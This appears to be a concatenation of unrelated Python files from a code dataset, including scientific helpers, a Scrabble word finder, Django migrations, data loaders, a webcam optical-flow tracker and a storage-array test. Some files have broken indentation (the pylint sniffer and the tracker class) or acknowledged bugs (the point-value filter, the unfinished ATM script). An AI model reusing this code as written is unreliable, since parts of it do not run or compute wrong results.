        # point but temp_TME does not — confirm whether both modes are intended here.
        effective_temp.append(temp_eff)
    temp = np.array(effective_temp)
    return temp
def temp_CMB(freq): #calculates antenna temperature for "Cosmic Microwave Background"
    """Return the antenna temperature array of the CMB at each frequency.

    Planck intensity (Denny eq. 2.16, with const.T as the CMB temperature)
    converted to antenna temperature (Denny eq. 2.7).
    """
    temp = []
    c1 = const.h / (const.k * const.T) #constants of Denny eq. 2.16
    c2 = 2 * const.h / (const.c ** 2) #constants of Denny eq. 2.16
    for i in freq:
        denom = np.exp(c1 * i) - 1 #denominator of Denny eq. 2.16
        intensity = c2 * (i ** 3)/denom #Planck intensity, Denny eq. 2.16
        antenna_temp = intensity * (const.c ** 2)/(const.k * (i**2)) #Denny eq. 2.7
        # NOTE(review): bling_CMB multiplies by 0.5 here (single polarization);
        # temp_CMB does not — confirm the difference is intentional.
        temp.append(antenna_temp)
    temp = np.array(temp)
    return temp
def temp_AR(freq, rad): #calculates antenna temperature for "Atmospheric Radiance"
    """Return the antenna temperature array for Atmospheric Radiance.

    `rad` arrives in the radiance files' units (W/cm^2/st/cm^-1) and is
    converted to SI before applying Denny eq. 2.7.
    """
    rad = rad / (3e6) #file units W/cm^2/st/cm^-1 -> W/m^2/st/Hz; factor follows the files' convention — TODO confirm
    rad = interpolate.InterpolatedUnivariateSpline(freq, rad, k=1) #linear interpolation of "rad" vs. "freq"
    temp = []
    for i in freq:
        antenna_temp = .5 * rad(i) * (const.c ** 2)/(const.k * (i**2)) #Denny eq. 2.7; the .5 selects one of 2 polarization modes
        temp.append(antenna_temp)
    temp = np.array(temp)
    return temp
def IT(bling_TOT, ratio, ts): #calculates Integration Time
    """Integration Time (Denny eq. 4.1): square of (total BLING * SNR ratio / total signal)."""
    scaled = bling_TOT * ratio / ts
    return np.array(scaled ** 2, dtype='float')
def TS(freq, inte, tau, d, resol): #calculates Total Signal
    """Total Signal: integrate intensity*transmission over each resolution band.

    Parameters:
        freq: array of band-centre frequencies [Hz]
        inte: source intensity sampled at `freq`
        tau: transmission sampled at `freq` (must match `freq` in length)
        d: aperture diameter; collecting area is pi*(d/2)^2
        resol: spectral resolution R; each band spans freq/(2R) on either side

    Returns the per-frequency total signal (equation 3.13 in Denny et al).
    Raises ValueError when `freq` and `tau` have different lengths.
    """
    # Validate with a real exception: `assert` is stripped under `python -O`,
    # so the original try/assert/raise pattern silently stops checking there.
    if len(freq) != len(tau):
        raise ValueError("The two arrays must have the same length.")
    f = interpolate.InterpolatedUnivariateSpline(freq, inte, k=1) #linear interpolation of "inte" vs. "freq"
    g = interpolate.InterpolatedUnivariateSpline(freq, tau, k=1) #linear interpolation of "tau" vs. "freq"
    resol = float(resol) #ensure float division below
    inte_resol = 1000.0
    step_size = 0.1 * 3 * 10 ** 10 / inte_resol #Riemann-sum increment [Hz]
    c = np.pi * (d / 2.0) ** 2 * step_size #collecting area times step width (eq. 3.13 constants)
    int_range_length = freq / 2 / resol #half-bandwidth nu/(2R) from eq. 3.13
    int_range = np.zeros((len(freq), 2)) #per-frequency [lower, upper] integration bounds
    int_range[:, 0] = freq - int_range_length #lower integration bound
    int_range[:, 1] = freq + int_range_length #upper integration bound
    ranges = (np.arange(*(list(i) + [step_size])) for i in int_range) #sample points for each band
    # Riemann sum of intensity*transmission over each band, scaled by area*step.
    ts = np.array([c * np.sum(f(i) * g(i)) for i in ranges])
    return ts
|
994,238 | 828db2a3154304b87c8e4aa357cf3253cf8bac2c | # -*- coding: utf-8 -*-
"""
Created on Fri Feb 19 16:55:54 2016
@author: Administrator
"""
import pandas as pd
import pandas.io.sql as pd_sql
import sqlite3 as sql
# Load the course-subject CSV, strip identifying/bookkeeping columns, dedupe
# by subject id, and load the result into the Django app's sqlite table.
df_file = pd.read_csv('CS_table_No2_No4_new.csv', delimiter=";", skip_blank_lines=True,
                      error_bad_lines=False, encoding='utf8')
# NOTE(review): error_bad_lines was removed in pandas 2.0 (use on_bad_lines='skip' there).
df_file = df_file.drop(['STUDENTID','ACADYEAR','CAMPUSID','SEMESTER','CURRIC','CAMPUSNAME','SECTIONGROUP','GRADE'], axis=1)
# keep='last' replaces take_last=True, which was deprecated in pandas 0.17
# and later removed; behavior (keep the last duplicate) is identical.
df_dropDup = df_file.drop_duplicates(['sub_id'], keep='last')
con = sql.connect("db.sqlite3")
pd_sql.to_sql(df_dropDup, "mywebpage_subject", con, index=False)
con.close()
994,239 | 3fe19b57673195d5c21a6420ef3057fceb6be422 | #! usr/bin/python3
if (__name__ == "__main__"):
from abstract_sniffer import Abstract_Sniffer
import abc
import os
else:
from smellml_modules.abstract_sniffer import Abstract_Sniffer
import abc
import os
class Pylint_Sniffer(Abstract_Sniffer):
    """Sniffer that runs pylint over a target and extracts its 10-point rating."""

    # Command template run by the framework; INFILE is substituted with the target path.
    # (The original wrapped this in str(f"...")), which is redundant for a constant.)
    CMD = "pylint INFILE"
    sniffer_name = "pylint"

    def __init__(self):
        """Pylint constructor; the sniffer keeps no per-instance state."""

    def get_sniffer_name(self):
        """Return the name of the sniffer."""
        return self.sniffer_name

    def parse_output(self, outputfile, directory):
        """Parse pylint's output file and return the extracted metrics.

        Returns:
            {"pylint_rating": <float>} on success, or {} when the output file
            is missing, too small to contain a rating, or cannot be parsed.
        """
        out_dictionary = {}
        # 600 bytes is the heuristic minimum for a report that includes a rating line.
        if os.path.exists(outputfile) and \
                os.path.getsize(outputfile) > 600:
            # with-block guarantees the handle is closed even if parsing below
            # raises (the original leaked the handle on a parse failure).
            with open(outputfile) as handle:
                lines = handle.readlines()
            try:
                # Second-to-last line looks like:
                # "Your code has been rated at 7.50/10 ..." -> take "7.50".
                rating = float(lines[-2].split(" ")[6].split("/")[0])
                out_dictionary["pylint_rating"] = rating
            except (IndexError, ValueError):
                # Narrowed from a bare except: only the expected parse failures
                # are treated as "no rating"; anything else should surface.
                print("something went wrong when parsing pylint")
        return out_dictionary
if (__name__ == "__main__"):
    # Ad-hoc manual test: run pylint over a sample tree and parse the result.
    pylint_sniff = Pylint_Sniffer()
    outfile = pylint_sniff.run_command("faceswap/tools/", "pylint_out2")
    outdirectory = os.path.dirname(outfile)
    pylint_sniff.parse_output(outfile, outdirectory)
|
994,240 | 1c50195fe10f2bfd18025d05c7055ae9ed2c08ca | import re
import string
import pickle
import itertools as it
from argparse import ArgumentParser
def num_vowels(word):
    """Count the uppercase vowels (A, E, I, O, U) in *word*."""
    return sum(1 for letter in word if letter in "AEIOU")
def num_consonants(word):
    """Count the characters of *word* that are not uppercase vowels."""
    return sum(1 for letter in word if letter not in "AEIOU")
def point_value(word):
    """Return the Scrabble point value of *word* (uppercase letters only)."""
    scores = {
        "A": 1, "B": 3, "C": 3, "D": 2, "E": 1, "F": 4, "G": 2, "H": 4,
        "I": 1, "J": 8, "K": 5, "L": 1, "M": 3, "N": 1, "O": 1, "P": 3,
        "Q": 10, "R": 1, "S": 1, "T": 1, "U": 1, "V": 4, "W": 4, "X": 8,
        "Y": 4, "Z": 10,
    }
    return sum(score * word.count(letter) for letter, score in scores.items())
def parse_range(range_):
    """Parse a numeric-range spec like "3", "2-5", "-4", "6-", or a
    comma-separated combination, and return a membership predicate.

    An omitted lower bound means 0; an omitted upper bound means 10**12.
    """
    spans = []
    for piece in range_.split(","):
        bounds = piece.split("-")
        if bounds[0] == "":
            bounds[0] = 0          # open lower bound
        if bounds[-1] == "":
            bounds[-1] = 10 ** 12  # open upper bound
        values = [int(bound) for bound in bounds]
        spans.append(range(min(values), max(values) + 1))
    return lambda candidate: any(candidate in span for span in spans)
def clean_pattern(pattern):
    """Strip characters that are not letters or pattern metacharacters
    (? * - [ ]) and uppercase the result; a falsy pattern yields ""."""
    if not pattern:
        return ""
    allowed = set(string.ascii_letters + "?*-[]")
    kept = [character for character in pattern if character in allowed]
    return "".join(kept).upper()
def sort_pattern(pattern):
    """Sort a cleaned pattern's tokens into canonical order.

    Tokens are bracket classes, '?', single letters, and '*'; they sort by
    ASCII, so '*' and '?' come before letters.
    """
    token_regex = re.compile(r"(\[[A-Z-]*\]|\?|[A-Z]|\*)")
    tokens = token_regex.split(pattern)
    return "".join(sorted(tokens))
def pattern_to_regex(pattern):
    """Convert a sorted anagram pattern into an alternation regex.

    Wildcard tokens ('?', '*', and bracket classes like "[AB]") are expanded
    and interleaved at every possible position among the fixed letters; the
    result is "(alt1|alt2|...)", or the pattern unchanged if it has no
    wildcards.

    Bug fix: the bracket-class branch originally returned the *builtin*
    `range` class instead of the matched token, so any pattern containing
    "[...]" raised a TypeError during string concatenation.
    """
    # TODO Smarten this up (on a per-letter basis.)
    range_regex = re.compile(r"(\?|\*|\[[A-Z-]*\])")
    wildcards = re.findall(range_regex, pattern)

    def wildcard_to_regex(token):
        # Translate a single wildcard token to its regex form.
        if token == "?":
            return "[A-Z]"
        elif token == "*":
            return "[A-Z]*"
        else:
            return token  # bracket class passes through (fix: was `return range`)

    wildcards = [wildcard_to_regex(token) for token in wildcards]
    fixed_letters = re.sub(range_regex, "", pattern)

    def insert_ranges(pat, tokens, positions):
        # Interleave wildcard tokens into `pat` at the given insertion points.
        pat_with_tokens = ""
        last_pos = 0
        for pos, token in zip(sorted(positions), tokens):
            pat_with_tokens += pat[last_pos:pos] + token
            last_pos = pos
        return pat_with_tokens + pat[last_pos:]

    if not wildcards:
        return pattern
    # Every permutation of the wildcards at every combination of insertion points.
    patterns = {
        insert_ranges(fixed_letters, permuted, positions)
        for permuted in it.permutations(wildcards)
        for positions in it.product(
            range(len(fixed_letters) + 1), repeat=len(wildcards)
        )
    }
    return f"({'|'.join(patterns)})"
def search(lexicon, args):
    """Return the subset of `lexicon` matching the pattern and numeric filters.

    `lexicon` maps WORD -> worddata dict containing at least the keys
    "alphagram", "length", "vowels", "consonants", "percent_vowels",
    and "percent_consonants". `args` is the namespace from build_parser().
    The regex is always matched against each word's *alphagram*.
    """
    pattern = clean_pattern(args.pattern)
    if args.exact:
        # Exact mode: the pattern is used positionally, with ? and * expanded.
        regex = pattern
        regex = re.sub("\?", "[A-Z]", regex)
        regex = re.sub("\*", "[A-Z]*", regex)
    elif args.subanagram:
        # Subanagram mode: letters may be used in any order, not all required.
        pattern = sort_pattern(pattern)
        regex = re.sub("\*", "", pattern)
        regex = re.sub("(.)", "\\1[A-Z]*", regex)  # allow gaps after every token
        regex = re.sub("\?", "[A-Z]", regex)
        regex = re.sub("^", "[A-Z]*", regex)       # allow a gap before the first token
    else:
        # Anagram mode (default): all letters used exactly once.
        pattern = sort_pattern(pattern)
        regex = pattern_to_regex(pattern)
    regex = f"^{regex}\\b"
    matching_words = {
        word: values
        for word, values in lexicon.items()
        if re.match(regex, values["alphagram"])
    }

    def select(words, field, range_):
        # Keep only entries whose field value falls in range_; a falsy range_
        # (filter not given on the command line) is a no-op.
        if not range_:
            return words
        if isinstance(range_, str):
            in_range = parse_range(range_)   # e.g. "--vowels 2-4"
        else:
            def in_range(val):
                return val in range_         # e.g. length list from -2..-9 flags
        return {
            word: worddata
            for word, worddata in words.items()
            if in_range(int(field(worddata)))
        }

    matching_words = select(
        matching_words, lambda word: word["length"], args.length
    )
    matching_words = select(
        matching_words, lambda word: word["vowels"], args.vowels
    )
    matching_words = select(
        matching_words, lambda word: word["consonants"], args.consonants
    )
    matching_words = select(
        matching_words,
        lambda word: word["percent_vowels"],
        args.percent_vowels,
    )
    matching_words = select(
        matching_words,
        lambda word: word["percent_consonants"],
        args.percent_consonants,
    )
    # NOTE(review): this passes the whole worddata *dict* into point_value,
    # which calls .count() on it — looks like it should be
    # lambda w: point_value(w["word"]); will raise when --point-value is used.
    matching_words = select(matching_words, point_value, args.point_value)
    return matching_words
def print_results(results, separate=True, long=False):
    """Print each result as a tab-separated line.

    With `long`, every field of the worddata dict is printed; otherwise only
    alphagram, word, and definition. With `separate`, a blank line is emitted
    between groups of consecutive entries sharing an alphagram.
    """
    previous_alphagram = None
    for entry in results.values():
        current_alphagram = entry["alphagram"]
        if (
            separate
            and previous_alphagram is not None
            and previous_alphagram != current_alphagram
        ):
            print()
        if long:
            line = "\t".join(str(value) for value in entry.values())
        else:
            line = "\t".join(
                [entry["alphagram"], entry["word"], entry["definition"]]
            )
        print(line)
        previous_alphagram = current_alphagram
def build_parser():
    """Build the command-line parser for the word-search tool."""
    parser = ArgumentParser(description="")
    # -2 .. -9 are shorthand word-length filters; each occurrence appends its
    # digit to args.length.
    for digit in range(2, 10):
        parser.add_argument(
            f"-{digit}", action="append_const", dest="length", const=digit
        )
    parser.add_argument("-a", "--anagram", action="store_true")
    parser.add_argument("-s", "--subanagram", action="store_true")
    parser.add_argument("-e", "--exact", action="store_true")
    parser.add_argument("-d", "--dict", "--dictionary", default="NWL2018")
    parser.add_argument("-l", "--length")
    parser.add_argument("-v", "--vowels", "--num-vowels")
    parser.add_argument("-c", "--consonants", "--num-consonants")
    parser.add_argument("-V", "--percent-vowels", "--pct-vowels")
    parser.add_argument("-C", "--percent-consonants", "--pct-consonants")
    parser.add_argument("-p", "--probability-order")
    parser.add_argument("-P", "--playability-order")
    parser.add_argument("--point-value", "--score")
    parser.add_argument("--long", action="store_true")
    parser.add_argument("--separate", action="store_true")
    parser.add_argument("pattern", metavar="PATTERN", nargs="?", default="\\*")
    return parser
def __main__():
    """Entry point: parse CLI args, load the pickled lexicon, search, print."""
    parser = build_parser()
    args = parser.parse_args()
    # NOTE(review): pickle.load executes arbitrary code from the file — only
    # open trusted dictionary files.
    with open(f"dicts/{args.dict}.pickle", "rb") as infile:
        words = pickle.load(infile)
    results = search(words, args)
    print_results(results, separate=args.separate, long=args.long)


if __name__ == "__main__":
    __main__()
|
994,241 | 3ff725e4b7ae33726b7ffb23fd2edc6d73eb97c6 | from .async_stream_receiver import AsyncStreamReceiver
from .tcp_stream_receiver import TCPStreamReceiver
class AsyncTCPStreamReceiver(AsyncStreamReceiver, TCPStreamReceiver):
    """TCP stream receiver combined with the asynchronous reading mixin.

    `_read`/`_release` are the hooks the async side calls; both delegate to
    the concrete TCP implementation.
    """

    def __init__(self, ip, port, *args, **kwargs):
        # TCP side is initialised first so the connection exists before the
        # async reader starts.
        # NOTE(review): cooperative super().__init__ is bypassed here — confirm
        # neither base class relies on the MRO chain.
        TCPStreamReceiver.__init__(self, ip, port, *args, **kwargs)
        AsyncStreamReceiver.__init__(self, *args, **kwargs)

    def _read(self):
        # Delegate the (blocking) read to the TCP implementation.
        return TCPStreamReceiver.read(self)

    def _release(self) -> None:
        # Release the TCP resources when the async loop shuts down.
        TCPStreamReceiver.release(self)
|
994,242 | c32394ea0af0e7d1c91048ac63b9d323aa58a0d4 | import sys, math
# Python 2 script (print statement; map() returning a list): reads a count
# header plus N integers from stdin and prints the probability that a random
# unordered pair of them attains the maximum pairwise sum.
nums = map(int, sys.stdin.readlines()[1:])  # skip the count header line
gauss = lambda x: (x/2.0)*(1+x)  # x-th triangular number = pairs among x+1 items
total = gauss(len(nums)-1)  # total number of unordered pairs
a = max(nums)
nums.remove(a)  # remove one instance of the maximum
b = max(nums)   # second-largest value (may equal a)
nums.remove(b)
if a == b:
    # Multiple copies of the maximum: any pair among those copies attains it.
    cnt = gauss(1 + nums.count(a))
else:
    # Unique maximum: it must pair with one of the second-largest values.
    cnt = 1 + nums.count(b)
shit_fmt = lambda x: math.floor(x*100.0)/100.0 # truncate (not round) to 2 decimals; b/c hackerrank is dumb.
print '{:.2f}'.format(shit_fmt(cnt/total))
994,243 | f5f181bc7cb377ad166c2eb198b4f39dff4d6c00 | # Generated by Django 3.0.3 on 2020-03-01 18:37
from django.db import migrations, models
class Migration(migrations.Migration):
    """Constrain camp_rules.schedule_time to the fixed set of schedule choices."""

    dependencies = [
        ('rule_based_engine', '0005_auto_20200302_0002'),
    ]

    operations = [
        migrations.AlterField(
            model_name='camp_rules',
            name='schedule_time',
            # Choices: run every 15 minutes, hourly, or daily.
            field=models.CharField(choices=[('min_15', 'every 15 min'), ('hour_1', 'every hour'), ('day_1', 'every day')], max_length=20),
        ),
    ]
|
994,244 | 1da65c6e632c50db358c4a7e5d540af24f52359b | # -*- coding: utf-8 -*-
from __future__ import division
import math
# Python 2 ATM-note script (prompt is in Portuguese: "enter the amount to withdraw").
valor=input('Digite quanto deseja sacar:')  # py2 input() evaluates the typed expression
a=20  # banknote denominations; only the 20-note is actually used below
b=10
c=5
d=2
e=1
j=(valor//a)  # how many 20-notes fit
r=(valor%a)   # remainder after the 20-notes
if r == 0:
    # NOTE(review): the script looks unfinished — only exact multiples of 20
    # print anything, and denominations b/c/d/e are never dispensed.
    print('a= %.1d'% j)
|
994,245 | 9efca94ef458a8e118c5dce57da1205fbc69ec39 | import os.path
import numpy as np
import pandas as pd
import util
# Query elasticsearch for the items to use for the data set
# Query elasticsearch for the items to use for the data set
def download_data(query_body, filename):
    """Fetch sold-item listings from elasticsearch and export them as a CSV.

    Items are filtered (must have stayed listed more than 10 seconds; price
    in (0, 2 exalted]), flattened to rows via util helpers, shuffled, and
    written to `filename` with one column per attribute seen in any row.
    """
    query_results = util.es_bulk_query(query_body)
    data = []
    columns = set()
    count = 0
    for item in query_results:
        # Ignore items that only moved stash tabs (removed almost immediately
        # after their last update) rather than being sold.
        if item['_source']['removed'] - item['_source']['last_updated'] <= 10:
            continue
        # Do basic formatting of the item
        i = util.format_item(item['_source'])
        # Keep only sanely-priced items: positive and at most 2 exalted.
        if i['price_chaos'] > 2 * util.VALUE_EXALTED or i['price_chaos'] <= 0.0:
            continue
        row = util.item_to_row(i)
        columns.update(row)  # union of all keys seen (was a per-key loop)
        data.append(row)
        count += 1
        if count % 10000 == 0:
            print('processed %d results' % count)
    print('column count: ', len(columns))
    # (Removed dead locals: an unused train/test split size was computed here.)
    df = pd.DataFrame(data, columns=sorted(columns))
    print("Got %d Hits:" % len(data))
    print('exporting to csv...')
    # Shuffle rows so the ES scroll ordering doesn't leak into later splits.
    df = df.iloc[np.random.permutation(len(df))]
    df.to_csv(filename, index=False, encoding='utf-8')
# Template query: sold items only (removed strictly after the last update and
# after a cutoff timestamp), excluding magic items whose typeLine is unreliable.
# The "should" clause is filled per item type in the loop below.
base_query = {
    "query": {
        "bool": {
            "should": [
                #{"match_phrase": {"typeLine": "Assassin Bow"}},
            ],
            "minimum_should_match": 1,
            # Don't include magic items, they mess with the typeLine
            "must_not": [
                {"match": {"frameType": 1}}
            ],
            "must": [
                {"script": {
                    # 1480995463 is a Unix timestamp (~Dec 2016): only listings
                    # removed after that date are considered.
                    "script": "doc['removed'].value > doc['last_updated'].value && doc['removed'].value > 1480995463"
                }
                }]
        }
    }
}

# One CSV per base item type; existing files are skipped so reruns are cheap.
for item_type in util.all_bases:
    matches = []
    for subtype in util.all_bases[item_type]:
        matches.append({"match_phrase": {"typeLine": subtype}})
    base_query["query"]["bool"]["should"] = matches
    filename = "data/" + item_type.lower().replace(" ", "_") + ".csv"
    if not os.path.isfile(filename):
        print("==> Fetching data for '%s'" % item_type)
        download_data(base_query, filename)
|
994,246 | 18103a4e900919fbc0ad1956eee5fd66bf59b206 | # Generated by Django 2.0.6 on 2018-08-15 01:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the Api app: Airport, Partner, Role, Token, User,
    and the User<->Role join table, plus the Token->User foreign key."""

    initial = True

    dependencies = [
    ]

    operations = [
        # Airport: identified by its 3-letter IATA-style code; carries the
        # per-airport service rates, commissions, and taxes.
        migrations.CreateModel(
            name='Airport',
            fields=[
                ('airport_code', models.CharField(max_length=3, primary_key=True, serialize=False)),
                ('airport_name', models.CharField(max_length=50)),
                ('valet_location', models.CharField(max_length=50)),
                ('minutes_pickup_delay_with_checkin', models.IntegerField(default=0)),
                ('minutes_pickup_delay_no_checkin', models.IntegerField(default=0)),
                ('rate_park_day', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_rent_day', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_valet', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_wash', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_detail', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_basic_cleaning_for_sublet', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_itinerary_change_return_to_owner', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_itinerary_change_per_mile_over_30_miles', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_valet_commission_park', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_valet_commission_terminal', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_valet_commission_fueling', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_valet_commission_itinerary_change_return', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_valet_commission_empty_trip', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_tax_1', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_tax_2', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_percent_sublet_paid_to_partner', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_percent_sublet_paid_to_auto_owner', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('promotion_points', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
            ],
        ),
        # Partner: a service business attached to an airport; its rate fields
        # mirror (and can override) the airport defaults.
        migrations.CreateModel(
            name='Partner',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('partner_name', models.CharField(max_length=50)),
                ('partner_tax_id', models.CharField(max_length=50)),
                ('address', models.CharField(max_length=50)),
                ('primary_number', models.CharField(max_length=50)),
                ('secondary_number', models.CharField(max_length=50)),
                ('has_wash', models.BooleanField(default=False)),
                ('has_detail', models.BooleanField(default=False)),
                ('partner_since', models.IntegerField(default=2018)),
                ('cumulative_points', models.IntegerField(default=0)),
                ('available_points', models.IntegerField(default=0)),
                ('partner_level', models.CharField(default='BASE', max_length=50)),
                ('partner_logo', models.ImageField(upload_to='')),
                ('rate_park_day', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_rent_day', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_valet', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_wash', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_detail', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_basic_cleaning_for_sublet', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_itinerary_change_return_to_owner', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_itinerary_change_per_mile_over_30_miles', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_valet_commission_park', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_valet_commission_terminal', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_valet_commission_fueling', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_valet_commission_itinerary_change_return', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_valet_commission_empty_trip', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_percent_sublet_paid_to_partner', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('rate_percent_sublet_paid_to_auto_owner', models.DecimalField(decimal_places=2, default=0, max_digits=5)),
                ('airport', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Api.Airport')),
            ],
        ),
        migrations.CreateModel(
            name='Role',
            fields=[
                ('name', models.CharField(max_length=50, primary_key=True, serialize=False)),
                ('description', models.CharField(max_length=50)),
            ],
        ),
        migrations.CreateModel(
            name='Token',
            fields=[
                ('token', models.TextField(primary_key=True, serialize=False)),
            ],
        ),
        # User: application account with driver's-license details; partner is
        # optional (NULL for ordinary customers).
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('email', models.CharField(max_length=50)),
                ('password', models.CharField(max_length=50)),
                ('salt', models.CharField(max_length=50)),
                ('name', models.CharField(max_length=50)),
                ('primary_number', models.CharField(max_length=50)),
                ('secondary_number', models.CharField(max_length=50)),
                ('address', models.CharField(max_length=50)),
                ('license_expiration', models.DateField()),
                ('license_number', models.CharField(max_length=50)),
                ('license_state', models.CharField(max_length=50)),
                ('member_since', models.IntegerField(default=2018)),
                ('cumulative_points', models.IntegerField(default=0)),
                ('available_points', models.IntegerField(default=0)),
                ('email_validated', models.BooleanField(default=False)),
                ('partner', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='Api.Partner')),
            ],
        ),
        # Many-to-many join between User and Role.
        migrations.CreateModel(
            name='UserRole',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('role', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Api.Role')),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Api.User')),
            ],
        ),
        # Token.user added after User exists.
        migrations.AddField(
            model_name='token',
            name='user',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Api.User'),
        ),
    ]
|
994,247 | 790c897bfe4d5c28ffc6d8c927b180b7e717f3cb | import numpy as np
import cv2
from constants import *
from utilities import *
# average movement sensitivity
sensitivity = 2.5
class optical_flow_advanced_tracker:
def __init__(self):
    # Tracking configuration: keep up to `track_len` past positions per track
    # and re-detect feature points every `detect_interval` frames.
    self.track_len = 10
    self.detect_interval = 5
    self.tracks = []  # list of point histories; newest position is last
    self.cam = cv2.VideoCapture(0)  # default webcam
    self.frame_index = 0
    self.arm = init_arm()  # presumably the robot arm driven by detected motion (see utilities) — TODO confirm
def start(self):
# main loop
while True:
_ret, frame = self.cam.read()
# flipping the frame to see same side of yours
frame = cv2.flip(frame, 1)
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# copy to show lines on
image_visuals_copy = frame.copy()
# if there are tracking points
if len(self.tracks) > 0:
previous_image_gray, current_image_gray = self.previous_gray, frame_gray
# collect previous points
previous_points = np.float32([tr[-1] for tr in self.tracks]).reshape(-1, 1, 2)
# lucas-kanade to track points between images
# the lucas-kanade parameters can be found under constants
current_points, _st, _err = cv2.calcOpticalFlowPyrLK(previous_image_gray, current_image_gray, previous_points, None, **lk_params_advanced)
# lucas-kanade reversed images - used for tracking lines
previous_points_reversed, _st, _err = cv2.calcOpticalFlowPyrLK(current_image_gray, previous_image_gray, current_points, None, **lk_params_advanced)
# calculate the distance traveled to check if tracked poits are close enough
d = abs(previous_points - previous_points_reversed).reshape(-1, 2).max(-1)
# calculate difference to test for movement
average_moving_distance = (current_points - previous_points).reshape(-1, 2).mean(axis=0)[0]
# moving condition
check_movement(d=average_moving_distance, sensativity=sensitivity, arm=self.arm)
# check if tracked points are close enough
good = d < 1
new_tracks = []
for tr, (x, y), good_flag in zip(self.tracks, current_points.reshape(-1, 2), good):
if not good_flag:
continue
tr.append((x, y))
if len(tr) > self.track_len:
del tr[0]
new_tracks.append(tr)
cv2.circle(image_visuals_copy, (x, y), 2, (0, 255, 0), -1)
self.tracks = new_tracks
cv2.polylines(image_visuals_copy, [np.int32(tr) for tr in self.tracks], False, (0, 255, 0))
# every interval number of frames
if self.frame_index % self.detect_interval == 0:
mask = np.zeros_like(frame_gray)
mask[:] = 255
# circle the collected points
for x, y in [np.int32(tr[-1]) for tr in self.tracks]:
cv2.circle(mask, (x, y), 5, 0, -1)
# collect new points with goodFeaturesToTrack that uses Shi-Tomasi Corner Detector
# that finds N strongest corners in the image
# and adds these points to the track list
points = cv2.goodFeaturesToTrack(frame_gray, mask = mask, **feature_params)
if points is not None:
for x, y in np.float32(points).reshape(-1, 2):
self.tracks.append([(x, y)])
# advance the frame counter
self.frame_index += 1
# save current frame as previous
self.previous_gray = frame_gray
cv2.imshow('lk_track', image_visuals_copy)
if cv2.waitKey(1) & 0xFF == ord("q"):
break
def main():
    """Entry point: run the advanced optical-flow tracker until the user quits."""
    tracker = optical_flow_advanced_tracker()
    tracker.start()
    print('Done')
# Run the tracker when executed as a script; tear down any OpenCV windows
# that are still open afterwards.
if __name__ == '__main__':
    main()
    cv2.destroyAllWindows()
994,248 | 816faa4b2bf15f81a077440778bf7ffda2bbbc33 | # coding=utf-8
# Copyright (c) 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
from unittest import TestCase
from hamcrest import assert_that, equal_to, instance_of, raises
from storops.exception import VNXLunNotMigratingError, VNXLunSyncCompletedError
from storops.vnx.resource.lun import VNXLun
from storops_test.vnx.cli_mock import t_cli, patch_cli
from storops.vnx.enums import VNXMigrationRate
from storops.vnx.resource.migration import VNXMigrationSession
__author__ = 'Cedric Zhuang'
class VNXMigrationSessionTest(TestCase):
    """Tests for VNXMigrationSession.

    All CLI traffic is faked by the @patch_cli decorator feeding canned
    naviseccli output into t_cli(); no real VNX array is contacted.
    """
    @patch_cli
    def test_properties(self):
        # Expected values mirror the default mocked "migrate -list" fixture.
        ms = VNXMigrationSession(0, t_cli())
        assert_that(ms.source_lu_id, equal_to(0))
        assert_that(ms.source_lu_name, equal_to('LUN 0'))
